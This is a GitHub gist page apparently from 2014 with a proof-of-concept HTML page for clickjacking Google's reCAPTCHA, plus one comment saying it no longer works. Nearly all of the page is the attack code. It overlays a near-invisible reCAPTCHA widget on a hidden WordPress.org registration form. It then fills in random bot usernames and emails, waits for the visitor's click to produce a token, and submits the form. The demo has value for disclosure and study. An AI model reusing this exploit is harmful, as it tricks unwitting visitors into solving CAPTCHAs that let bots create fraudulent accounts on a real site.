Skip to content

Instantly share code, notes, and snippets.

@mufid

mufid/README.md

Created December 4, 2014 15:32
Show Gist options
  • Save mufid/076855a10df9ebacf45c to your computer and use it in GitHub Desktop.
Save mufid/076855a10df9ebacf45c to your computer and use it in GitHub Desktop.
Download ZIP
Homakov's No-captcha Recaptcha Clickjacking
Raw
README.md
Raw
demo.html
<html><head><meta name="referrer" content="never">
<script type='text/javascript' src='https://www.google.com/recaptcha/api.js?ver=2'></script>
</head><body>
<form method="post" action="https://wordpress.org/support/register.php">
<div style="opacity:0.1" class="g-recaptcha" data-sitekey="6Ld6gcoSAAAAAEkCxPeS-_sqEokNIHwNCOtx17xo"></div>
<input name="user_login" type="hidden" id="user_login" size="30" maxlength="30" value="" />
<input name="user_email" id="user_email" type="hidden" value="" />
</form>
In the real world exploit it will be completely transparent. Make a click! If you see "Invalid domain for site key" you're using an old browser. If you start getting a challenge - you're not a Good guy anymore :(
<script>
function makeid()
{
var text = "";
var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
for( var i=0; i < 7; i++ )
text += possible.charAt(Math.floor(Math.random() * possible.length));
return text;
}
user_login.value='BOT-'+makeid();
user_email.value='BOT-'+makeid()+'@gmail.com';
check = setInterval(function(){
v=document.getElementById('g-recaptcha-response').value
if(v.length>0){
alert('Thanks for helping my bot! Your token is '+v);
document.forms[0].submit();
clearInterval(check);
}
},400)
</script>
</body></html>
@512banque
Copy link

doesn't work, it detects the referrer and always suggests captcha when on your page, although it doesn't when you're directly on wordpress.org.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment